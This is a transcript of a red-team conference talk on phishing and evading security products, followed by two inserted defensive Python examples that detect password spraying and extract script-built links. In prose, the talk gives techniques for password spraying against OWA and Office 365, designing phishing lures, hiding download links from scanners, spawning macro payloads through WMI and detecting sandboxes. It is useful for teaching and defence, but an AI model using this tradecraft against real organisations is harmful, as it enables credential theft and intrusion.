Hey guys, how's it going? I was supposed to do a joke about BitConnect, so should I do it or not? What's up? What's up? What's up? What's up? BitConnect! So send me your money for my ICO and we'll raise like a couple of million dollars together. So this is pretty much a phishing attempt to get your money, which is some of the stuff that we're gonna discuss in this talk.

So who am I? I work at Mandiant, a FireEye company. I'm doing red team, web application testing, internal, external, and stuff like that. I really enjoy writing assembly. Some people think I'm crazy because of that, but I guess I love it. I love to bypass stuff. So this is something that you have to do when you perform red team, because your client may have security products in the way, so you have to figure out a way to go through them. I've been with NorthSec for four years now. I'm a native French Québécois, which explains my terrible accent. It's all actually my parents' fault, not mine, so blame them for that.

What we're gonna talk about today: the goal of a red team, because there's a lot of misconception about red team. Again, this is my personal opinion, so I could be wrong. You could be right. It's a question of point of view. And then identifying your target. So when you're targeting a company, what we should do and a couple of tricks to actually find interesting value that can really help you doing a red team. Phishing, so a couple of pieces of advice that I personally use when I perform phishing; which kind of payload you should use in certain specific situations; and hunting. This is, again, not a complete thing about red team, because we don't have like 12 hours to talk about it. But I'll give you some of the tips that I personally use when I perform red team and a couple of tools and tips at the end regarding red teaming.

So first of all, the goal of red team. Obviously, you want to assess your client's responsiveness against real actors.
Usually when you perform an internal penetration test, you're gonna run like an automated scan that's gonna give you a big picture of everything they have in their network and a bunch of unpatched software and stuff like that. Usually red teamers are not gonna run automated tools, because we want to assess if they're able to actually detect us. So we're trying to be a bit more quiet over the network. So we provide a different kind of feedback. Evaluating their security posture: we're usually gonna define goals with the client. So access the CEO's email, for example, getting domain admin access, or targeting a specific application that contains like the real good assets, like customer information and stuff like that, right? And also trying to demonstrate the kind of path that an attacker can actually use to get access to this information. Because most of the time we're gonna define domain admin as a goal, but we don't necessarily need domain admin to actually get access to really valuable assets, right?

What red team is not about: exploiting as many 0-days as possible. To me, a red team is most likely a sysadmin job. So you get your first foothold, then you just have to understand your environment and figure out who has the access to the specific application that you want to target, right? And again, it's also not exploiting as many systems as possible, because you want to remain stealthy. So sometimes I've conducted red teams where I only had two shells for the whole thing, and it was enough to actually achieve all the goals. So that's perfect for you, because you can remain pretty stealthy. So if you make the analogy between internal testing and red team, internal testing is most like Rambo: you're shooting everywhere and you're just trying to actually get shells everywhere. And it's usually a little bit easier to get domain admin that way, but it's extremely noisy, and it's not something that you can do when you perform red team. Red team is more like James Bond.
You're more stealthy, a little bit more sexy on the network. Usually your tradecraft is gonna be a bit more sophisticated than just like using your muscle to shoot everywhere. But the real question: are we really as sexy and stealthy as James Bond when we perform red team? We're gonna discover that some of the techniques that we use are not necessarily as stealthy as we thought, unfortunately. And that's one of the things that I want to address, just give you insight into tricks that I use to actually be a bit more stealthy. Unfortunately, there's no magic way to get data without being detected at some point, because that's how it works, right? You need to fetch data. So at some point you need to establish a connection to a specific service, at least.

So let's move on to identifying your target. First of all, you need a list of targets, right? So are you gonna phish employees, specific types of employees? Let's say you're looking at an insurance company. Are you gonna target the insurance claims guys that have limited access? Are you gonna try to go to the managers or people with a little bit more privilege? It may be interesting, because they may have specific programs internally that can be used for a better phishing campaign. Identifying their security products: even if you don't have a foothold, there's sometimes some insight that you can get to actually identify this kind of information and pick the right phishing campaign for your target. We'll discuss this a bit later.

I'll give you a perfect example. This is actually a real screenshot from a real client. That was a fairly new company, so they didn't have many emails that were leaked in data breaches and stuff like that, which is a good place to find a couple of emails for your target company. However, they were really active on Facebook, so they were posting pictures in their office with a bunch of people, and they tagged every single employee in the picture. Finding the email pattern is usually something simple.
You need to find one or two and you're gonna understand that this is their email pattern. So I basically crafted emails based on their names on Facebook. Again, bonus points: some of these people were actually putting their job on Facebook. So it was even easier for me to figure out that this person was an underwriter at the company or doing something else. So you can select your target more efficiently. So looking at Facebook is really a good idea if you're looking for potential names for a specific company, if you don't get many emails through a public channel.

As I mentioned, searching publicly available password dumps. There's a couple of huge dumps like Adobe, Ashley Madison, and a bunch of others in the past that can actually give you a bunch of email addresses that can be used. You don't really care about the password; you're mostly gonna phish those people. So you just reuse this information. GitHub: you'll be surprised how many devs actually put their email in the author field, and it's actually a company one. There was an incident a couple of months ago that happened with a company that actually had emails leaked through their GitHub, and they also leaked internal passwords that way. So you can even find passwords sometimes for free. Pastebin, same idea: people may just put some things to share with a friend, and they kind of forget that it's public sometimes and indexed by Google. So you can also find it that way.

Another really good thing is OWA. Actually, OWA is the devil, pretty much. You can do a lot of amazing stuff with OWA. Most companies are now moving to Office 365, which is the cloud version of it, but there's still a super cool feature. OWA on-premise, you can actually leak the GAL, which is the global address list, which contains all the employees. All you need is a password, right? But it's not really hard, because people tend to have terrible passwords. So one of the things that you can do: brute-force their passwords.
So assume that you found a list of emails. Use the good old season plus the year, so Spring2019, and just spray it against all of them. And you're probably going to find at least one or two accounts. It doesn't really matter if they're privileged or not, because you can use this credential to actually get to the service, which actually has the filter to get people filtered, that's going to provide you the list of all their employees. So from there, you can just restart the whole process, but with all of their Active Directory, which is fairly interesting. Cool thing: even if MFA is enabled, so multi-factor authentication is enabled, it's still going to work without it. It basically just supports basic authentication, so it's fairly easy to script it. There's a bunch of tools online that actually do that for you. So targeting OWA is really lucrative.

Same approach with Office 365. There's a public API that you can use that achieves pretty much the same thing. So again, you just have to leak a couple of emails, and you can query the API and find the information. Again, you can also perform password brute-force on autodiscover, which is a public domain for all the cloud clients. And most of the time clients don't get insight into the kind of attacks that are performed against this domain, because it's owned by Microsoft. So it may take a bit of time before they actually realize that their ADFS is actually being brute-forced externally, because nobody looks at their logs, right? Do you? I don't, personally.

Shodan is also really useful. You'll be surprised how many good old Citrix portals, OWA, VPNs are actually publicly exposed by your targets. Just use Shodan. All the information is there. You're going to get all that you need. And if it's not multi-factor authentication, usually by using the previous information that you got by brute-forcing passwords through OWA, you may find a valuable employee that has Citrix portal access to a specific application.
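A defender-side look at the spraying pattern just described, added here as an example and not part of the talk or the speaker's tooling: a few constructed authentication log lines, a check that separates "one source, many accounts, one or two tries each" from a single user fumbling their own password, and a filter that catches the season-plus-year guesses the speaker says always work. The log format, the addresses, the thresholds and the seasonal regex are all assumptions; real OWA, ADFS or cloud sign-in logs have their own schemas, so the parser is the part to adapt.

```python
"""Detect password spraying in authentication logs.

Added example, not from the talk.  The log format (timestamp result user ip),
the addresses and the thresholds are constructed assumptions; real OWA, ADFS
or cloud sign-in logs have their own schemas, so parse_log is the part to
adapt.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries a single guess against many accounts
# (one failure each, then one success); a second source is one user who
# mistypes their own password a few times, which is ordinary noise.
SAMPLE_LOG = """\
2019-03-04T08:00:01 FAIL alice 203.0.113.7
2019-03-04T08:00:02 FAIL bob 203.0.113.7
2019-03-04T08:00:03 FAIL carol 203.0.113.7
2019-03-04T08:00:04 FAIL dave 203.0.113.7
2019-03-04T08:00:05 FAIL erin 203.0.113.7
2019-03-04T08:00:06 SUCCESS frank 203.0.113.7
2019-03-04T08:10:00 FAIL grace 198.51.100.9
2019-03-04T08:10:05 FAIL grace 198.51.100.9
2019-03-04T08:10:09 FAIL grace 198.51.100.9
2019-03-04T08:10:20 SUCCESS grace 198.51.100.9
"""

LINE_RE = re.compile(r"^(\S+) (FAIL|SUCCESS) (\S+) (\S+)$")


def parse_log(text):
    """Return a list of (timestamp, result, user, ip) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines outside the constructed format
        ts, result, user, ip = m.groups()
        events.append((datetime.fromisoformat(ts), result, user, ip))
    return events


def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Flag sources whose failures span many accounts with few tries each.

    Returns {ip: {"users": distinct accounts that failed,
                  "success": [accounts that succeeded inside the same window]}}.
    Many tries against one account is brute force, not spraying, and is
    deliberately not reported here.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "FAIL"]
        for i, start in enumerate(fails):
            per_user = defaultdict(int)
            for e in fails[i:]:
                if e[0] - start[0] > window:
                    break
                per_user[e[2]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                end = start[0] + window
                successes = sorted({e[2] for e in evs
                                    if e[1] == "SUCCESS" and start[0] <= e[0] <= end})
                findings[ip] = {"users": len(per_user), "success": successes}
                break
    return findings


# Season + four-digit year, optionally followed by the "bang at the end" the
# talk mentions; these satisfy length and complexity rules yet are the first
# guesses sprayed, so a banned-password filter should reject them at set time.
SEASON_RE = re.compile(r"^(spring|summer|fall|autumn|winter)(20\d\d)[!@#$%^&*.?]*$", re.I)


def is_seasonal_password(pw):
    """True for guesses such as Spring2019 or Summer2018!."""
    return SEASON_RE.match(pw) is not None


if __name__ == "__main__":
    print(detect_spray(parse_log(SAMPLE_LOG)))
    print(is_seasonal_password("Summer2018!"))
```

The window and thresholds are tuned for the sample; in practice the account count and the success-after-failures correlation are what distinguish a spray from ordinary help-desk noise, and the seasonal filter belongs in the password-change path rather than in the log pipeline.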
And from there, you can try to do Citrix escape and stuff like that and basically get a shell inside of their own network without even having to phish the whole company, which is very interesting, because the most critical part is usually the phishing. This is where you have to interact with the user, so you have a better chance of being detected at that specific step. So that's a good trick. And as I told you, the good old Summer2018 is always going to work, unfortunately, because it's compliant even if your password policy is enforced, except nobody enforces the special character policy on Active Directory. So even if you know for a fact that your client is enforcing that, just add a bang at the end, and you're still going to get success, unfortunately. And that's the fact. That's the sad part of it. I'm not even joking.

So you want to identify which kind of security products your clients have. There's a couple of tricks like that. Most of the security products tend to be verbose. They kind of want to show you that they're there, and they're really proud of being there. So they're usually going to have a bunch of information that you can actually use. So try to find an email that is not used anymore, so it has been deactivated by your targeted corp, and send an email to that client. Of course, it's going to bounce back, saying that the user does not exist anymore. And look at the SMTP headers. You'll be really surprised by all the information that you can find. Just three simple examples. The first one is the Microsoft technology. So you have, like, the reputation of the email, and you can confirm that everything is good and it didn't detect anything shady with your payload. And even there, you can notice that they don't have SPF enabled, which is another bad thing. The second one is Proofpoint. And you have the scoring of your email.
So if you're scoring badly, maybe you should adapt your phishing campaign a bit to make sure that you're going to score better before doing the actual phishing campaign against your client. Last one, good old McAfee. So again, you can know for a fact that they use McAfee technology on the other side, and you can kind of adapt your phishing email to make sure that you're not going to be detected by the solution that they use.

Another simple example: LinkedIn, it's your friend. Just look for the kind of jobs that they're offering. It may help you. So if they're looking for a Splunk admin, Palo Alto, ArcSight, for example, you kind of know what they're probably using on the other side. They're basically creating a label based on this information. Also, the corporate website is really useful to get ideas. Most big companies now have like a loyalty program internally, or they're involved in like a charity program and stuff like that. So if you know for a fact that there's an upcoming event in a month, let's say, you can decide to make a phishing campaign based on this. So it's kind of good timing if you have an active email about that at that specific time. Or if they have a loyalty program, you can claim that you changed something in the loyalty program, and you have to subscribe there and provide your Active Directory credentials on the third-party website. It's 100% legitimate.

So at that point, let's assume that there's a bunch of other ways to actually perform this part. But let's assume that we collected a good list of emails. Rules I personally follow when I do a phishing campaign. The first one: never put your malicious payload in the email. That's really important, because you don't get any visibility, and I'll cover this a little bit more in detail afterward. Don't allow automated solutions to have insight into your final stage. So if you know a way to actually prevent automated tools from actually fetching your payload, do it. It's always going to benefit you.
Use categorized domains. You don't have to go through most proxies that way, so you don't even have to worry that your C2 server may just not be authorized by the corporate proxy. Use HTTPS. There's no reason not to do it. You're just going to blend with the rest of the encrypted traffic. Be as boring as possible. I know that a lot of people don't agree with me on this one, but I personally strongly believe that you should make your phishing campaign as boring as possible and as corporate as possible. So if you have a code of conduct thing, just: here's a code of conduct update. Please read it and approve it. Nobody's going to do it. Nobody cares. But you're always going to get one or two persons that finally are going to do it. It may take like two days before you get your shell, but at least they're just going to ignore it. If you offer something to people, usually they're going to be more thrilled, and they're going to look at the email and say, oh, yeah, I got 50 bucks or something like that in an Amazon card. So they're really going to look at the email and take a look at the email again and may realize that it's fishy and may potentially raise an alarm. Especially nowadays, there's a lot of companies that have a phishing button built in, like in Outlook, for example, so it's fairly easy now to report.

Using typosquatting nowadays, I think it's a really bad idea, because it's a bit more fishy, and we're living in the everything-as-a-service era. So for us, it's pretty common to see like subdomains, like company subdomains such as FireEye.whatever-thirdparty.com, because this is now how the Internet works. So having this is more legit than like FireEye with a 3 for the E, for example. And don't reuse your domain. As a red teamer and as a company, some of your samples may end up on VirusTotal, because a client may catch you and they may try to analyze it. So you may actually just leak other client information that way, and it's not something that you want to do.
So malicious payload. If it's inside of your email, you don't know if it was fetched. You don't know which kind of solution potentially fetched it. You have zero control over it. So one of the things that you should do is always put a link to a website where your payload is hosted. If they have a solution that actually fetches your payload, you're going to know for a fact that the solution fetched the website, so you can fingerprint the IP address and maybe correlate this IP address, and it's easier for you to swap it, because you can just change the content of the website on the fly without having to send a new phishing campaign with new links.

So this is a perfect example. As I mentioned, I'm personally a huge fan of the Code of Conduct Update. So you just say: Hi Bob, we currently updated the Code of Conduct policy. Please just review and accept as soon as possible. And you provide this super corporate link with the UID at the end so you can track your user. One thing is really important, because if you know for a fact that this ID was tied to a specific user and you see three different IPs fetching the same payload, you're probably facing an automated product that is actually trying to understand what's going on with your email. So it may raise a red flag on your side. As you can see here, the URL format is a bit complex and it tends to be corporate, because most of these third parties actually have super impossible URL schemes. So I personally use the mod_rewrite engine to simply create whatever link I want. So this is a perfect example of a rule that I use, which basically says: it doesn't matter what you put in the URL, I'm just always going to redirect to index.php. So you can be as creative as you want. Sometimes I'm even enjoying myself by just adding an ASPX extension even if it's a PHP server. ASPX sounds more corporate to me than PHP most of the time. It may actually convince people. The devil is in the details, as they say. So this is a perfect example of making a corporate URL.
Rule number two, as I told you: don't allow an automated tool to actually fetch your final payload. This is a trick that I love a lot. I basically generate the link using JavaScript. Simple as that, because 99% of those products don't actually parse JavaScript. So this is a typical website: so you have your link to the website, and the website has a link to this shady macro-enabled Word document, and you just click on it. So most of the tools are actually going to parse the HTML and find the link and actually get to the payload, and they're going to analyze it and potentially maybe detect you. So if there's a way to actually hide this URL, why not do it? And JavaScript is exactly the tool that you need. You basically create the link, which is an empty link. You don't forget about this link, and it says, yeah, there's nothing shady here, that's a perfectly fine website. However, you have your little piece of JavaScript at the end that basically creates the location and actually fills the URL for you, and bonus point in this case, as you can see on the last line, I'm going to force the click. And phishing is always about the user interaction. If your user enjoys the experience, he's most likely going to follow through the path. So if you force the download pop-up for him, he doesn't even have to click on the link, so there's more chance that he's actually going to click and download it. So by doing the click action, you're just going to fetch the page and you're going to be prompted with the download. So that's perfect, right? That's convenient. And the sandbox is not going to be able to see that, because it's a JavaScript-generated link.

Use categorized domains. Fairly simple. There's a bunch of websites that are already categorized.
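The JavaScript-generated link above works because a scanner that only reads anchor tags never sees the real URL. As an added defender-side example, not from the talk or the speaker's tools, here is a small link extractor that also pulls URLs out of inline script assignments to `href`, `location` and `window.open`, joining concatenated string literals so a split URL is recovered. The HTML sample is constructed to mirror the pattern the talk describes (an empty anchor that a script fills in and then clicks); the `example.test` host names are placeholders.

```python
"""Extract candidate URLs from a landing page, including links that exist
only after JavaScript runs.

Added example, not from the talk.  SAMPLE_HTML is constructed to mirror the
pattern the talk describes (an empty anchor that a script fills in and
clicks); the host names are placeholders.
"""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """\
<html><body>
<a id="dl" href="#">Download the updated policy</a>
<a href="https://policy.example.test/about">About</a>
<script>
  var l = document.getElementById("dl");
  l.href = "https://policy.example.test/download/" + "update.docm";
  window.location = 'https://policy.example.test/landing';
  l.click();
</script>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect static href values and the text of every inline script."""

    def __init__(self):
        super().__init__()
        self.static = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.static.append(value)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


# A navigation target (.href, .src, location, window.open) followed by one or
# more string literals joined with '+'.  Variables, encoders and anything more
# dynamic than literal concatenation are not followed: that needs a real
# JavaScript engine, which is exactly the gap the talk describes in static
# scanners.
ASSIGN_RE = re.compile(
    r"(?:\.href|\.src|\blocation(?:\.href)?|window\.open\()\s*=?\s*"
    r"((?:\s*\+?\s*(?:\"[^\"]*\"|'[^']*'))+)")
LIT_RE = re.compile(r"\"([^\"]*)\"|'([^']*)'")


def extract_links(html):
    """Return {"static": [...], "scripted": [...]} for the given HTML."""
    collector = _LinkCollector()
    collector.feed(html)
    scripted = []
    for js in collector.scripts:
        for m in ASSIGN_RE.finditer(js):
            url = "".join(a or b for a, b in LIT_RE.findall(m.group(1)))
            if url:
                scripted.append(url)
    return {"static": collector.static, "scripted": scripted}


if __name__ == "__main__":
    for kind, urls in extract_links(SAMPLE_HTML).items():
        print(kind, urls)
```

A page whose only download link appears in the "scripted" list and whose static anchors are empty or `#` is itself a useful signal for a mail gateway or analyst, independent of what the scripted URL turns out to serve.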
Personally, I use this little tool, which is like a four-liner of bash, which clones a website and changes the base, so I can clone a website which is an exact copy of the original one and send it to categorizers such as Blue Coat, which is actually now Symantec, and a bunch of other companies, so they're just going to categorize your domain because it's a legitimate well-known domain. After that you're good to go, and you can use this domain for phishing or for your C2 connection. You can also use this for your expired domains, if you're lazy, like me. So I just wrote this little tool a couple of years ago which goes on expired domains, and you just give a keyword, and it's going to list a bunch of domains that are actually expired, and you can buy them if they're available, so you can find already categorized domains. And that's another thing: there's some security product companies that are actually going to look at the date of registration, so if this domain was there forever, you may actually bypass this check, and they're going to say, oh yeah, this domain has been around for like 10 years, so it's probably safe. Because if you just bought the domain two days ago, registered it, and they see it in their network, they're going to put a red flag on it, like, this domain is freshly registered, it may be shady, right? So this approach can help you with that too.

Rule number four: use HTTPS with a valid certificate. Let's Encrypt is free. Right now, unfortunately, not the whole web is actually using this, but I'm pretty sure over time most of the Internet is probably going to use Let's Encrypt, because it's free. So right now I've seen some companies that actually put a red flag when it's Let's Encrypt, because they know it's free and a lot of bad guys are actually using it.
But in the future I'm pretty sure that most of the companies are going to rely on Let's Encrypt, so you're just going to be another guy with Let's Encrypt. But you can also afford a paid certificate with like RapidSSL or all of the other providers. And bonus point for Let's Encrypt: you don't even have to validate yourself for the certificate. The others are going to ask for a bunch of information, and I don't like lying on the Internet, so I feel like providing fake information is not something that's really good.

Number five, being as boring as possible. Again, as I discussed earlier, if your client has expectations, they're most likely going to reread the email again. And remember last time you had an email saying, hey, you got this 50% discount? I'm pretty sure that most of you look at the URL, that it may be fishy, that something like they're offering me money or a discount on something, why, is it a phishing campaign? But if I send you this good old "Hey, can you please complete your timesheet? You're like one month due and you didn't fill your timesheet, please just do it and log into the interface," you're going to hate it, but you're still going to do it, because it's corporate and you want to be a good employee. So that's a perfect example of a boring phishing campaign, and personally I had better success with boring campaigns than like those super cool campaigns where you're going to get everything you want if you subscribe there.

Typosquatting. Like, for example, northsec.io vs northsec.canadianevent.com. If you look at it real fast, it kind of looks legitimate, it may be a real domain, but if you're taking a look at it, it's obviously typosquatting, because we're not a NorthSec event, we're NorthSec. But if you look at northsec.canadianevent.com, it looks way more legitimate. It's probably just a Canadian website that has a list of all the Canadian events, for example. We don't know. It sounds legitimate, and NorthSec is spelled correctly, which is another good thing, because this is what we're used to. And if you look at
third parties, for example, you'll see: just tomorrow, on Monday, when you get back to your job, look at your job, look how many different subdomains you're using that are not even related to your company. You'll be actually pretty impressed by how many subdomains you're going to see that are not related to you.

Number seven: don't reuse your domain for other projects. Your payload may end up on VirusTotal, because some of your clients may detect you, you never know, and you may actually leak other client information, especially if you're using your client name as a subdomain. So they may find the NS records and stuff like that, which is not something that you want, because you want to be transparent about that, obviously.

Payload. So at that point you're going to be a victim. So I'm just going to take a sip of water before the payload. So the phishing campaign is almost ready, we just need to put a payload inside of the phishing campaign. Nowadays there's the classic approach: act differently if you're in front of a security product, which is basically evading sandboxes. But they realized it was not necessarily an efficient model, so they moved to endpoint solutions, right? So your client is actually in front of, but we still find a lot of clients that actually have like inline sandboxes. So if you can just stop the execution on the sandbox, you're good to go. But there's also a couple of little tricks that you can use on the endpoint to kind of defeat the detection. So I'll cover some of the examples that I actually personally do when I do phishing campaigns.

Just to be clear, I'm going to define my definition of obfuscation versus evasion. The concept of obfuscating code is to actually have the same result but written differently. So instead of just putting three, I'm going to obfuscate it and change it to one plus two. So the result is the same, but if they're performing static analysis and they're looking for the malicious three, in this case, they're not going to see the three, right? That's the idea. If you're doing evasion, you're
going to use specific conditions to actually act differently. So in this case, let's say if context equals sandbox, so we're fingerprinting the sandbox in a certain way, okay, fine, you can do three. If it's not the case, just exit. So in this case the code is never going to run, and most sandboxes will say, yeah, your code is fine, we didn't detect anything suspicious.

Being trendy is not necessarily a good thing. For you guys that do red team, you're probably mostly using PowerShell scripts nowadays, because it's the new cool thing. But if you remember a couple of years ago, when we used to use Metasploit modules that were mostly executables and DLLs, we were still achieving the same things, just a different way. But vendors also followed the trend, right? So right now most of the detections are based on PowerShell. They're working really hard on detecting PowerShell as much as they can, because that's what people use now. When was the last time that you actually heard about someone saying, here's the new cool detection against binaries? They don't really care, because most people moved to PowerShell. So if you come up with other ways of actually executing code on your target, it may actually be super good for you, because the chances of being detected are a bit lower.

So first advice for the payloads: don't run PowerShell directly. All the vendors are going to detect you in a second, because they know that you're going to use PowerShell. So the minute that you actually start the PowerShell process, they're going to detect you. They have different levels of detection, but there's a tool that I wrote a couple of years ago which is called PowerLessShell, which is using a technique that was well documented in the past that uses C# to actually create a runspace environment and execute PowerShell without actually using the PowerShell binary itself. So if you use that, you're going to run whatever PowerShell you want without having to bother executing the PowerShell process itself. If
you're using macros, for example, the well-known technique is to rely on WScript.Shell or the function called Shell itself. The big issue with that is WinWord is going to actually spawn a process, a child process that is going to be like cmd or whatever you run, and most of the systems are going to detect the child process of WinWord, which is not what you want, right? The solution that I came up with is to use WMI through WinWord, so through your macro, sorry. The idea is your child process is not going to be tied to WinWord, it's actually going to be tied to the WmiPrvSE service, which is actually the WMI service. So there's no link between the execution of your payload and the Word document itself. And I have another tool for that, which is Malicious Macro Generator, that generates terribly sophisticated macros that are super useful when you want to phish people.

Again, if you're planning to use signed binaries, be careful, again, because they all know about it. It's super trendy, a lot of people discuss it on Twitter and post examples, so it's a matter of hours sometimes before the vendor is actually going to have the new rules for those well-known binaries. Like regsvr32 was a well-known binary where you can specify a URL to a COM object that you control, and it's going to download and execute it. So you're using like whitelisted signed Windows binaries to actually run your code, right? However, I got some insight about the fact that some people found a way to actually run these binaries and modify the code, but they're going to remain signed. So I actually wrote a little script that modifies the hash of those signed binaries, but they're still going to remain signed by Microsoft. So even if you change the data, it's still going to remain signed. So it's fairly interesting, because you're still signed. So if your endpoint solution is blacklisting everything that is not signed by Microsoft, you're going to pass this check, but if they also look at the hash of well-known bad signed binaries, you're also going to pass this check. So
usually you can actually execute your code using this. The only downside is you have to drop this binary on the system, but it's still something that you can do. So your first stage can be: drop this signed binary that was modified, like regsvr32, for example. So you drop your modified version of regsvr32 and you actually run the same modified version, and they may not detect you.

Another trick that worked with some products, again, they have different levels of detection: just rename powershell.exe to something random. Some of them are not even bothering looking at the hash of the binary that you're running, they're just going to look at the name. So just rename it and do your things, and it's still going to work perfectly. Again, you can do it inside of your macro, because some software, again, may actually detect that you're going to run the command copy powershell and rename it. So just do it inside of your macro if you're using macros as your first attack vector. It's fairly simple: just copy file source destination and you're good to go.

You should always put a condition in your code to evade sandboxes. You never know; even if your OSINT didn't reveal any specific security product, just do it. It costs nothing and it may save your life. Perfect example: when I use ClickOnce. The way that ClickOnce works, at the end of the day, is it's just an executable, but Microsoft came up with a super cool user-friendly way of delivering them through Internet Explorer. So you click on the link and you have this super like cool fancy setup that just starts, so people feel like, I guess it's more safe that way, right? For whatever reason. But if your payload is fetched by a security product, they usually are just going to get the binary and they're going to run it. So an easy check for ClickOnce: check if Internet Explorer is actually running, because if there's a ClickOnce running on the system and Internet Explorer is not open, it's impossible, like, there's something shady going on, you're probably like in the sandbox or
something like that. So in this case, in C#, you can just check for the process, and if it's the case, if Internet Explorer is running, you can be as evil as much as you want after that. Again, I have a tool which is called ClickOnceGenerator that allows you to generate those fancy ClickOnce heavily sophisticated things, and you have all the options to actually specify which kind of process you want to look for. Another one that is really interesting to look for is Outlook, obviously, if you know for a fact that they're using the fat client. So if someone's actually reading your email and Outlook is not open, again, it sounds a bit shady to me.

Payload, again. Sometimes you have issues and you're facing a specific client and you have to come up with a solution, because you know that they're going to detect this specific type of payload. So sometimes, time to time, I just write tools to actually try to evade them. So the first one is for scriptlets, so SCT files. If you want to use like Cobalt Strike or Empire built-in SCT files, you can just send the file through SCT-obfuscator, and it's just going to make it a bit more obfuscated, and usually you're good to go. UniByAv is actually an EXE obfuscator, sorry, and it just takes shellcode and is going to generate an EXE for you that is heavily obfuscated, and you should be good to go again. And it also supports a bunch of evasion modules, so you can actually specify which module you want to use. Don't Kill My Cat, I presented that last year at NorthSec actually. It's relying on polyglot images, so it's a 100% valid image, but it's also 100% valid shellcode if you start from the first byte of the image. So over the network you're just going to see an image, and most of the sandbox products don't really care about an image, because they don't want to lose their CPU cycles analyzing a legitimate image. For PowerShell, there's my friend that is actually presenting at the same time, from FireEye, Invoke-Obfuscation, and he's actually
presenting Invoke-DOSfuscation as we speak, and this is a heavy framework that adds obfuscation to your code. But if you're using Cobalt Strike or Empire, you may realize that most of the time, if you have the one-liner, it's just going to be a one-liner, base64 encoded, and most of the products now actually fingerprint that specific pattern. So I just wrote a little simple tool that actually obfuscates the base64 itself, so it's more convenient for this kind of specific tool. Feel free to just take a look at my GitHub and see how it works; if you're interested in more details I can provide them after the presentation.

The problem with sandboxes: they're fingerprintable and predictable, because you know for a fact that this is not a real environment; this is an environment trying to see what's going on with your malware. So there are a lot of tricks that you can actually use to prevent your code from running in sandboxes. For example, look at the memory size: if it's less than 4 GB, you're probably living in the past or you're a sandbox, because nowadays 4 GB on a computer is pretty legitimate. Same with the disk size: if you have less than 250 GB of disk, you're probably not a legitimate computer, you're just a sandbox. Again, there are some sandboxes that fake this information, but there are other ways to look at that; you can also look at the hooks that they created. Number of CPUs, same thing. I don't even know if it's possible to buy a single CPU anymore, probably not; you're probably going to have at least 2 cores, so that's another thing that you can check. I'm assuming even 4 is probably good in 2018. Again, as I mentioned, look for a specific process running: if you're phishing someone and you don't see outlook.exe running, that's probably not your original target. A difference between an endpoint and your actual sandbox is network access: does your sandbox have network access? That's another easy one. Here's my payload, and you don't have network access; how did my payload actually end up there? So that's something that you can check. If you're targeting a company, usually they're going to be joined to the domain, so you can check if the current user that is running your payload is joined to a domain. If it's not the case, that's probably not, again, the target that you're looking for. Time zone: if you're targeting a Canadian company and you know exactly which time zone they're in, there's no reason to have a weird time zone from a different country, right? So it may be another sign that you're running your code in a shady environment. Detecting hooks: there are a bunch of sandboxes that actually have hooks and they're going to fake some answers, so if you ask for a specific Windows API they may force an answer. But there's actually a way to detect hooks, so you can detect that the function was hooked and just abort if it's the case. Uptime, for example: if you're targeting someone after lunch and the computer was up for like five seconds, maybe it's another shady sandbox that just fired up. Look at the clipboard, look at the network traffic that you're receiving. If the clipboard is empty, that may be the case, but usually people are copy-pasting stuff all day long, so if it's empty that's another good sign that you're probably looking at a sandbox right now. And there are like billions of other techniques, and we could talk about this for probably six hours, but be creative, that's the key, and don't be shy to actually play with those sandboxes and try to figure out how they work. You're going to benefit from that.

Rule number five: connecting back to your C2 as stealthily as possible. There are a lot of techniques that were publicly disclosed lately, like domain fronting. So using a legitimate domain to front your C2 domain is something quite cool, because your client is going to see traffic to a legitimate, let's say, Microsoft website, and from there
you can actually send the C2. So it's kind of hard to figure out what's going on from a higher perspective, a little bit harder at least. Categorize the domain: again, I think we covered this one pretty well. And force HTTPS: again, there's no reason for you not to use HTTPS. You're going to blend into the rest of the HTTPS traffic, and most companies don't perform SSL interception, so they're going to have zero visibility on what's going on. Also select a legitimate protocol. In the past, they used to do all the traffic over raw TCP that was actually encrypted, but most RATs now have moved to HTTP, because they just want to blend into legitimate traffic. So again, using HTTP for your own RAT is probably a good idea if you want to write your own.

Which brings me to ThunderShell, which is a RAT that I wrote a couple of months ago, and again it was to solve an issue on a specific engagement. The issue that we had is the endpoint solution was actually analyzing the network traffic using a minifilter, which is basically a filter that you can put on the network traffic. So even if you use HTTPS, when it hits the target the traffic is going to be decrypted at the OS level, right? So they still have visibility on the clear-text traffic. So if you have your stager, they are actually going to see it in the clear. So the solution was to come up with encryption performed not at the OS level but at the software level. So ThunderShell is actually encrypting everything using RC4. So when the target receives the traffic, it's RC4 encrypted, which doesn't give any information to the minifilter because it's just gibberish, and the PowerShell RAT actually performs the decryption at that point, so the network has no visibility on this actual traffic. So you're going to have your shellcode, which is the first shellcode that's going to fetch the remote DLL or EXE that's going to be loaded in memory, then it's going to be executed. The problem with that is most of these solutions are actually going to send the second stage in the clear over the network, so you're going to see this shady Cobalt Strike DLL going through the network, which is not necessarily something that you want. So by doing RC4 encryption and avoiding having a second stage, it's pretty much good to go again. So this is basically the scheme of how the ThunderShell RAT works: you use RC4 encryption and send it over HTTPS; Windows decrypts the HTTPS stream, then the network filter is at that position, and the PowerShell RAT actually decrypts the RC4 after the hook was set, so they have zero visibility. Again, it just doesn't download a second stage, which is a good thing. And feel free to contribute to the project; I wish it can be useful for more than just me. I'm actually working on a web UI right now to make it as convenient as possible, but feel free to join me in that project if you're interested; it will be a pleasure to work with you.

